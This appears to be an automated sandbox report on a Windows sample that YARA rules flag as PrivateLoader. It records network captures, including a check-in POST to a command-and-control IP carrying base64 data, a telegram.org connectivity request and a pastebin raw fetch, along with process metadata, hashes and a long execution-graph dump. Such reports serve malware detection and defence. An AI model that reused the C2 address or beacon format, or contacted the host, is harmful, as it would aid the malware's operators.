                                               6 | 192.168.2.5 | 49731 | 212.193.30.21 | 80 | 3792 | C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe
                                               Timestamp | Bytes transferred | Direction | Data
                                               Jul 24, 2024 17:28:43.238810062 CEST | 287 | OUT | POST /service/communication.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                              Content-Length: 25
                                              Host: 212.193.30.21
                                               Jul 24, 2024 17:28:43.238838911 CEST | 25 | OUT | Data Raw: 64 61 74 61 3d 52 32 56 30 56 6d 56 79 63 32 6c 76 62 6e 77 77 4c 6a 67 3d
                                              Data Ascii: data=R2V0VmVyc2lvbnwwLjg=


                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                               0 | 192.168.2.5 | 49704 | 149.154.167.99 | 443 | 3792 | C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe
                                               Timestamp | Bytes transferred | Direction | Data
                                               2024-07-24 15:26:52 UTC | 191 | OUT | GET / HTTP/1.1
                                              Connection: Keep-Alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                              Host: telegram.org
                                               2024-07-24 15:26:52 UTC | 448 | IN | HTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Wed, 24 Jul 2024 15:26:52 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 19541
                                              Connection: close
                                              Set-Cookie: stel_ssid=dd3949a2cafe5c78e4_15718661345566907739; expires=Thu, 25 Jul 2024 02:33:32 GMT; path=/; samesite=None; secure; HttpOnly
                                              Pragma: no-cache
                                              Cache-control: no-store
                                              X-Frame-Options: SAMEORIGIN
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                               2024-07-24 15:26:52 UTC | 15936 | IN
                                              Data Ascii: <!DOCTYPE html><html class=""> <head> <meta charset="utf-8"> <title>Telegram Messenger</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta property="og:title" content="Telegram a new era of messaging
                                               2024-07-24 15:26:52 UTC | 3605 | IN
                                              Data Ascii: r attacks.</div> </div> </div> <div class="tl_main_card_cell"> <div class="tl_main_card_wrap"> <picture class="dev_page_tgsticker tl_main_card_animated js-tgsticker_image"><div></div><source type="application/x-tgsticker" srcs


                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                               1 | 192.168.2.5 | 49724 | 104.20.4.235 | 443 | 3792 | C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe
                                               Timestamp | Bytes transferred | Direction | Data
                                               2024-07-24 15:27:37 UTC | 203 | OUT | GET /raw/A7dSG1te HTTP/1.1
                                              Connection: Keep-Alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                              Host: pastebin.com
                                               2024-07-24 15:27:37 UTC | 436 | IN | HTTP/1.1 404 Not Found
                                              Date: Wed, 24 Jul 2024 15:27:37 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              x-frame-options: DENY
                                              x-frame-options: DENY
                                              x-content-type-options: nosniff
                                              x-content-type-options: nosniff
                                              x-xss-protection: 1;mode=block
                                              x-xss-protection: 1;mode=block
                                              cache-control: public, max-age=1801
                                              CF-Cache-Status: MISS
                                              Server: cloudflare
                                              CF-RAY: 8a84ef70ddba72ab-EWR
                                               2024-07-24 15:27:37 UTC | 698 | IN
                                              Data Ascii: 2b3<!DOCTYPE html><html lang="en"><head> <meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=1.0, user-scalable=yes" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Pastebin.
                                               2024-07-24 15:27:37 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0



                                              Target ID:0
                                              Start time:11:26:49
                                              Start date:24/07/2024
                                              Path:C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe"
                                              Imagebase:0x310000
                                              File size:411'648 bytes
                                              MD5 hash:5AE2C7E495880D7E209A41158FD72984
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000000.00000000.2033107820.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:false

                                              Target ID:1
                                              Start time:11:26:49
                                              Start date:24/07/2024
                                              Path:C:\Users\user\AppData\Local\Temp\vXQpuA.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Local\Temp\vXQpuA.exe
                                              Imagebase:0x610000
                                              File size:15'872 bytes
                                              MD5 hash:F7D21DE5C4E81341ECCD280C11DDCC9A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 92%, ReversingLabs
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:5
                                              Start time:11:26:55
                                              Start date:24/07/2024
                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 1392
                                              Imagebase:0x30000
                                              File size:483'680 bytes
                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true


                                                Execution Graph

                                                Execution Coverage:4.3%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:59.7%
                                                Total number of Nodes:857
                                                Total number of Limit Nodes:14
25968->25969 25969->25966 25970->25759 25971->25762 25972->25764 25973->25767 25974->25744 25975->25746 25976->25748 25977->25751 25978->25771 25979->25773 25980->25774 25981->25778 25983 357cfb 25982->25983 25987 357d2d 25982->25987 25989 353b58 34 API calls 3 library calls 25983->25989 25985 357d1e 25990 357b3e 44 API calls 4 library calls 25985->25990 25987->25784 25988->25784 25989->25985 25990->25987 25992 351f3b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 25991->25992 25992->25788 26390 353a9b GetLastError 25993->26390 25997 311810 27 API calls 25996->25997 25998 31ae0f 25997->25998 26427 31aa00 25998->26427 26001 31b1ad 26004 349348 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 26001->26004 26002 311810 27 API calls 26003 31af40 26002->26003 26005 31aa00 55 API calls 26003->26005 26006 31b1e8 26004->26006 26007 31af45 26005->26007 26006->25795 26007->26001 26008 311810 27 API calls 26007->26008 26009 31b06e 26008->26009 26010 31aa00 55 API calls 26009->26010 26011 31b073 26010->26011 26011->26001 26012 311810 27 API calls 26011->26012 26013 31b1a8 26012->26013 26014 31aa00 55 API calls 26013->26014 26014->26001 26016 315bcf __wsopen_s 26015->26016 26017 311810 27 API calls 26016->26017 26018 315bff 26017->26018 26019 349554 _Allocate 16 API calls 26018->26019 26020 315c10 26019->26020 26021 315c26 ___scrt_fastfail 26020->26021 26024 315c4f __aulldiv 26020->26024 26697 33d8c0 53 API calls __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 26021->26697 26023 315c47 26023->26024 26025 324ef0 27 API calls 26024->26025 26026 315d91 26025->26026 26027 311810 27 API calls 26026->26027 26028 315db0 26027->26028 26029 311810 27 API calls 26028->26029 26030 316065 26029->26030 26031 33f8b0 28 API calls 26030->26031 26044 316082 __aulldiv 26031->26044 26032 317aef 26033 311810 27 API calls 26032->26033 26034 317aff 26033->26034 26035 349554 _Allocate 16 API calls 26034->26035 26036 317b0d 26035->26036 26037 317b23 ___scrt_fastfail 
26036->26037 26038 317b4c 26036->26038 26710 33d8c0 53 API calls __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 26037->26710 26039 324ef0 27 API calls 26038->26039 26040 317ba1 26039->26040 26043 311810 27 API calls 26040->26043 26042 317b44 26042->26038 26045 317bc0 26043->26045 26044->26032 26049 311810 27 API calls 26044->26049 26046 311810 27 API calls 26045->26046 26047 317dcf 26046->26047 26048 33f8b0 28 API calls 26047->26048 26056 317de2 __aulldiv 26048->26056 26050 316549 26049->26050 26051 325560 27 API calls 26050->26051 26052 31656a 26051->26052 26698 314de0 39 API calls 4 library calls 26052->26698 26054 31845d 26055 311810 27 API calls 26054->26055 26057 31846d 26055->26057 26056->26054 26711 315340 39 API calls 4 library calls 26056->26711 26059 349554 _Allocate 16 API calls 26057->26059 26058 316579 __aulldiv 26061 325560 27 API calls 26058->26061 26060 31847b 26059->26060 26063 318491 ___scrt_fastfail 26060->26063 26064 3184ba 26060->26064 26065 3166eb 26061->26065 26712 33d8c0 53 API calls __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 26063->26712 26067 324ef0 27 API calls 26064->26067 26699 325e80 11 API calls allocator 26065->26699 26069 31850f 26067->26069 26071 311810 27 API calls 26069->26071 26070 3184b2 26070->26064 26072 31852e 26071->26072 26073 311810 27 API calls 26072->26073 26074 31873d 26073->26074 26075 33f8b0 28 API calls 26074->26075 26081 318750 26075->26081 26076 3166fa __aulldiv 26078 311810 27 API calls 26076->26078 26080 317ae0 26076->26080 26077 318ae0 26079 311810 27 API calls 26077->26079 26082 316ac6 26078->26082 26083 318af0 26079->26083 26085 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26080->26085 26081->26077 26094 3188d3 26081->26094 26086 325560 27 API calls 26082->26086 26087 349554 _Allocate 16 API calls 26083->26087 26084 31844e 26088 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26084->26088 26085->26032 
26089 316ae7 26086->26089 26090 318afe 26087->26090 26088->26054 26700 314de0 39 API calls 4 library calls 26089->26700 26092 318b14 ___scrt_fastfail 26090->26092 26122 318b3d __aulldiv 26090->26122 26714 33d8c0 53 API calls __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 26092->26714 26093 31824b __aulldiv 26093->26084 26103 3183f8 26093->26103 26713 315340 39 API calls 4 library calls 26094->26713 26097 316af6 __aulldiv 26101 316c92 26097->26101 26701 326290 27 API calls Concurrency::cancellation_token_source::~cancellation_token_source 26097->26701 26098 318a99 26100 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26098->26100 26099 318b35 26099->26122 26102 318ab7 26100->26102 26702 325e80 11 API calls allocator 26101->26702 26105 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26102->26105 26109 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26103->26109 26107 318ac6 26105->26107 26110 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26107->26110 26108 316ca1 26111 311810 27 API calls 26108->26111 26113 318425 26109->26113 26241 317aba 26110->26241 26112 316df8 26111->26112 26114 325560 27 API calls 26112->26114 26115 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26113->26115 26117 316e19 26114->26117 26118 318434 26115->26118 26116 349348 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 26119 31a9ed 26116->26119 26703 314de0 39 API calls 4 library calls 26117->26703 26121 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26118->26121 26119->25798 26121->26241 26123 324ef0 27 API calls 26122->26123 26124 318c7f 26123->26124 26125 311810 27 API calls 26124->26125 26127 318c9e 26125->26127 26126 317ad1 26709 325e80 11 API calls allocator 26126->26709 26128 311810 27 API calls 26127->26128 26130 
318f80 26128->26130 26131 33f8b0 28 API calls 26130->26131 26134 318f9d __aulldiv 26131->26134 26132 319999 26133 311810 27 API calls 26132->26133 26135 3199a9 26133->26135 26134->26132 26138 3190d9 26134->26138 26152 319308 __aulldiv 26134->26152 26136 349554 _Allocate 16 API calls 26135->26136 26137 3199b7 26136->26137 26139 3199cd ___scrt_fastfail 26137->26139 26163 3199f6 __aulldiv 26137->26163 26715 34cf43 26138->26715 26719 33d8c0 53 API calls __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 26139->26719 26141 316e28 __aulldiv 26141->26126 26704 327220 27 API calls 2 library calls 26141->26704 26144 3176a3 26705 327400 27 API calls 26144->26705 26146 34cf43 34 API calls 26161 319125 ___scrt_fastfail 26146->26161 26148 3199ee 26148->26163 26149 3176e2 26150 327340 27 API calls 26149->26150 26151 317721 26150->26151 26706 327400 27 API calls 26151->26706 26152->26132 26718 315340 39 API calls 4 library calls 26152->26718 26154 317760 26155 327340 27 API calls 26154->26155 26156 31779f 26155->26156 26707 327400 27 API calls 26156->26707 26159 3177de 26160 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26159->26160 26162 3177f0 26160->26162 26168 34cf43 34 API calls 26161->26168 26164 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26162->26164 26167 324ef0 27 API calls 26163->26167 26165 3177ff 26164->26165 26166 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26165->26166 26169 31780e 26166->26169 26170 319b38 26167->26170 26171 3192c1 26168->26171 26172 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26169->26172 26173 311810 27 API calls 26170->26173 26171->25798 26174 31781d 26172->26174 26175 319b57 26173->26175 26176 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26174->26176 26177 311810 27 API calls 26175->26177 26185 31782c __aulldiv 26176->26185 
26178 319e1b 26177->26178 26181 33f8b0 28 API calls 26178->26181 26179 31998a 26180 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26179->26180 26180->26132 26190 319e38 __aulldiv 26181->26190 26182 317ac2 26183 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26182->26183 26183->26126 26184 319760 __aulldiv 26184->26179 26187 319916 26184->26187 26185->26182 26189 317a5d 26185->26189 26186 31a83b 26188 311810 27 API calls 26186->26188 26193 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26187->26193 26191 31a976 26188->26191 26196 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26189->26196 26190->26186 26195 319f74 26190->26195 26221 31a1a6 __aulldiv 26190->26221 26192 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26191->26192 26194 31a994 26192->26194 26197 319943 26193->26197 26198 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26194->26198 26199 34cf43 34 API calls 26195->26199 26200 317a8a 26196->26200 26201 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26197->26201 26202 31a9a3 26198->26202 26203 319f79 26199->26203 26708 325e80 11 API calls allocator 26200->26708 26205 319952 26201->26205 26206 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26202->26206 26215 34cf43 34 API calls 26203->26215 26208 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26205->26208 26209 31a9b2 26206->26209 26207 317a99 26210 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26207->26210 26211 319961 26208->26211 26213 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26209->26213 26214 317aa8 26210->26214 26212 311a20 
Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26211->26212 26216 319970 26212->26216 26217 31a9c1 26213->26217 26218 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26214->26218 26223 319fc0 ___scrt_fastfail 26215->26223 26219 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26216->26219 26220 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26217->26220 26218->26241 26219->26241 26220->26241 26221->26186 26720 315340 39 API calls 4 library calls 26221->26720 26224 34cf43 34 API calls 26223->26224 26225 31a15f 26224->26225 26225->25798 26226 31a82c 26227 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26226->26227 26227->26186 26228 31a5ef __aulldiv 26228->26226 26229 31a7a9 26228->26229 26230 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26229->26230 26231 31a7d6 26230->26231 26232 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26231->26232 26233 31a7e5 26232->26233 26234 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26233->26234 26235 31a7f4 26234->26235 26236 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26235->26236 26237 31a803 26236->26237 26238 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26237->26238 26239 31a812 26238->26239 26240 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26239->26240 26240->26241 26241->26116 26243 3270b7 26242->26243 26244 3296b0 27 API calls 26243->26244 26245 32710c 26244->26245 26246 326200 27 API calls 26245->26246 26247 327152 26246->26247 26248 325470 27 API calls 26247->26248 26249 32715e 26248->26249 26250 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 
26249->26250 26251 327182 26250->26251 26252 349348 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 26251->26252 26253 321f07 26252->26253 26254 325560 26253->26254 26721 326330 26254->26721 26257 31b1f0 26259 31b26e __aulldiv 26257->26259 26258 31c3f3 26260 311810 27 API calls 26258->26260 26259->26258 26263 31b44c 26259->26263 26268 31b736 26259->26268 26261 31c405 26260->26261 26262 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26261->26262 26264 31c420 26262->26264 26265 34cf43 34 API calls 26263->26265 26266 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26264->26266 26270 31b451 ___scrt_fastfail 26265->26270 26267 31c322 26266->26267 26271 349348 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 26267->26271 26731 311390 26268->26731 26274 34cf43 34 API calls 26270->26274 26275 31c449 26271->26275 26277 31b4d2 26274->26277 26275->25806 26276 31b7f3 26278 327080 27 API calls 26276->26278 26281 34cf43 34 API calls 26277->26281 26279 31b931 26278->26279 26280 34cf43 34 API calls 26279->26280 26282 31b93d 26280->26282 26287 31b519 ___scrt_fastfail 26281->26287 26283 349554 _Allocate 16 API calls 26282->26283 26284 31b9b6 26283->26284 26285 31b9f5 26284->26285 26286 31b9cc ___scrt_fastfail 26284->26286 26288 327080 27 API calls 26285->26288 26750 33d8c0 53 API calls __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 26286->26750 26291 34cf43 34 API calls 26287->26291 26293 31bd3c __aulldiv 26288->26293 26290 31b9ed 26290->26285 26292 31b6b5 ___scrt_fastfail 26291->26292 26292->25806 26294 324ef0 27 API calls 26293->26294 26295 31befc 26294->26295 26296 325560 27 API calls 26295->26296 26297 31bf1d 26296->26297 26298 327340 27 API calls 26297->26298 26299 31bf4a 26298->26299 26300 33f8b0 28 API calls 26299->26300 26301 31bf6a 26300->26301 26302 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 
26301->26302 26303 31bf79 26302->26303 26304 34cf43 34 API calls 26303->26304 26305 31bf7e ___scrt_fastfail 26304->26305 26306 31c339 26305->26306 26307 325560 27 API calls 26305->26307 26308 34cf43 34 API calls 26306->26308 26309 31c01f 26307->26309 26312 31c33e ___scrt_fastfail 26308->26312 26310 31c059 26309->26310 26311 31c28b 26309->26311 26315 34cf43 34 API calls 26310->26315 26313 31c2a1 26311->26313 26314 31c32a 26311->26314 26316 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26312->26316 26321 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26313->26321 26317 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26314->26317 26318 31c05e 26315->26318 26319 31c3c6 26316->26319 26317->26306 26322 34cf43 34 API calls 26318->26322 26320 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26319->26320 26323 31c3d5 26320->26323 26324 31c2ce 26321->26324 26339 31c0a5 ___scrt_fastfail 26322->26339 26325 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26323->26325 26326 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26324->26326 26327 31c3e4 26325->26327 26328 31c2da 26326->26328 26329 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26327->26329 26330 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26328->26330 26329->26258 26331 31c2e9 26330->26331 26332 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26331->26332 26333 31c2f8 26332->26333 26334 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26333->26334 26335 31c307 26334->26335 26336 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26335->26336 26337 31c313 26336->26337 26338 311a20 
Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26337->26338 26338->26267 26340 34cf43 34 API calls 26339->26340 26341 31c244 26340->26341 26341->25806 26342->25809 26343->25811 26344->25813 26345->25815 26346->25823 26349 311a32 Concurrency::cancellation_token_source::~cancellation_token_source 26347->26349 26348 311a83 26348->25816 26349->26348 26350 312010 allocator 11 API calls 26349->26350 26350->26348 26352 31189d 26351->26352 26352->26352 26353 311c20 27 API calls 26352->26353 26354 3118d4 26353->26354 26354->25827 26356 311c70 26355->26356 26357 311c34 __InternalCxxFrameHandler 26355->26357 26755 311ea0 27 API calls 4 library calls 26356->26755 26357->25869 26359->25876 26360->25879 26362 32735c 26361->26362 26362->26362 26363 326200 27 API calls 26362->26363 26364 327393 26363->26364 26364->25885 26365->25890 26366->25946 26367->25951 26368->25953 26369->25832 26370->25840 26371->25847 26372->25861 26373->25932 26374->25935 26375->25942 26376->25964 26377->25968 26378->25843 26379->25851 26380->25895 26381->25908 26382->25891 26384 349351 26383->26384 26385 349353 IsProcessorFeaturePresent 26383->26385 26384->25793 26387 349395 26385->26387 26756 349359 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 26387->26756 26389 349478 26389->25793 26391 353ab2 26390->26391 26392 353ab8 26390->26392 26419 354c1e 6 API calls __dosmaperr 26391->26419 26396 353abe SetLastError 26392->26396 26420 354c5d 6 API calls __dosmaperr 26392->26420 26395 353ad6 26395->26396 26397 353ada 26395->26397 26403 353b52 26396->26403 26404 3219ec LoadLibraryA LoadLibraryA 26396->26404 26421 356f2e 14 API calls 2 library calls 26397->26421 26400 353ae6 26401 353b05 26400->26401 26402 353aee 26400->26402 26423 354c5d 6 API calls __dosmaperr 26401->26423 26422 354c5d 6 API calls __dosmaperr 26402->26422 26426 35352b 34 API calls _unexpected 26403->26426 26404->25791 26404->25795 26408 353afc 26413 3543f6 _free 14 API 
calls 26408->26413 26410 353b11 26411 353b15 26410->26411 26412 353b26 26410->26412 26424 354c5d 6 API calls __dosmaperr 26411->26424 26425 3538c9 14 API calls __dosmaperr 26412->26425 26416 353b02 26413->26416 26416->26396 26417 353b31 26418 3543f6 _free 14 API calls 26417->26418 26418->26416 26419->26392 26420->26395 26421->26400 26422->26408 26423->26410 26424->26408 26425->26417 26428 31aa3d 26427->26428 26449 349554 26428->26449 26431 31aa5b ___scrt_fastfail 26487 33d8c0 53 API calls __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 26431->26487 26433 31aa76 26434 31aa7b __aulldiv 26433->26434 26459 324ef0 26434->26459 26437 311810 27 API calls 26438 31ac11 26437->26438 26439 311810 27 API calls 26438->26439 26440 31ac74 26439->26440 26463 33f8b0 26440->26463 26443 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26444 31ac9d 26443->26444 26445 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26444->26445 26446 31acac 26445->26446 26447 349348 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 26446->26447 26448 31acc7 26447->26448 26448->26001 26448->26002 26452 349559 26449->26452 26451 31aa4b 26451->26431 26451->26434 26452->26451 26454 349575 _Allocate 26452->26454 26488 351f67 26452->26488 26495 352295 EnterCriticalSection LeaveCriticalSection _Allocate 26452->26495 26455 349a7b Concurrency::cancel_current_task 26454->26455 26496 34a9cb RaiseException 26454->26496 26497 34a9cb RaiseException 26455->26497 26457 349a98 26460 324f81 26459->26460 26460->26460 26500 325ff0 26460->26500 26462 31abf2 26462->26437 26467 33f8f1 26463->26467 26464 33fa3f 26465 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26464->26465 26466 33fa51 26465->26466 26468 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26466->26468 26467->26464 26469 325560 27 API calls 26467->26469 26470 33fa5d 
26468->26470 26471 33f934 26469->26471 26472 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26470->26472 26474 325560 27 API calls 26471->26474 26473 33fa69 26472->26473 26585 325f50 26473->26585 26476 33f94c 26474->26476 26505 33faa0 26476->26505 26479 349348 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 26480 31ac88 26479->26480 26480->26443 26487->26433 26493 3548df __dosmaperr 26488->26493 26489 35491d 26499 350cb8 14 API calls __dosmaperr 26489->26499 26491 354908 RtlAllocateHeap 26492 35491b 26491->26492 26491->26493 26492->26452 26493->26489 26493->26491 26498 352295 EnterCriticalSection LeaveCriticalSection _Allocate 26493->26498 26495->26452 26496->26455 26497->26457 26498->26493 26499->26492 26501 326047 26500->26501 26502 326004 __InternalCxxFrameHandler 26500->26502 26504 327f50 27 API calls 5 library calls 26501->26504 26502->26462 26504->26502 26506 33fafe 26505->26506 26507 33fb2c 26506->26507 26514 33fb59 26506->26514 26508 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26507->26508 26509 33fb3f 26508->26509 26510 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26509->26510 26511 33fb4e 26510->26511 26512 349348 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 26511->26512 26513 33f958 26512->26513 26513->26464 26539 340b80 26513->26539 26516 33fcf8 26514->26516 26589 340c20 21 API calls __InternalCxxFrameHandler 26514->26589 26590 326a60 27 API calls 26516->26590 26518 33fe53 26519 33febd 26518->26519 26591 326a60 27 API calls 26518->26591 26521 3400b4 26519->26521 26523 33ff10 26519->26523 26524 3400b2 26521->26524 26600 326290 27 API calls Concurrency::cancellation_token_source::~cancellation_token_source 26521->26600 26592 326200 26523->26592 26601 341010 27 API calls 2 library calls 26524->26601 26527 3400a6 26596 325470 26527->26596 26529 34014f 26602 341010 27 API calls 2 library 
calls 26529->26602 26531 3401a5 26532 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26531->26532 26533 3401b8 26532->26533 26534 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26533->26534 26535 3401c4 26534->26535 26536 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26535->26536 26537 3401d0 26536->26537 26538 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26537->26538 26538->26511 26604 340d10 26539->26604 26542 33f630 26543 33f667 26542->26543 26544 33f689 26543->26544 26545 33f66e 26543->26545 26548 33f6a4 26544->26548 26549 33f6bf 26544->26549 26546 325f50 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26545->26546 26547 33f681 26546->26547 26547->26464 26565 33f780 26547->26565 26550 325f50 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26548->26550 26551 33f6d6 26549->26551 26552 33f6ee 26549->26552 26550->26547 26553 325f50 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26551->26553 26554 340b80 27 API calls 26552->26554 26553->26547 26555 33f6ff 26554->26555 26617 3403a0 26555->26617 26558 33f712 26560 325f50 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26558->26560 26559 33f72a 26561 33f751 26559->26561 26562 33f739 26559->26562 26560->26547 26564 325f50 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26561->26564 26563 325f50 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26562->26563 26563->26547 26564->26547 26634 3407c0 26565->26634 26567 33f7b3 26638 3405e0 26567->26638 26570 33f7fa 26572 325f50 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26570->26572 26573 33f802 26572->26573 26654 340f20 26573->26654 26578 33f861 26581 325f50 
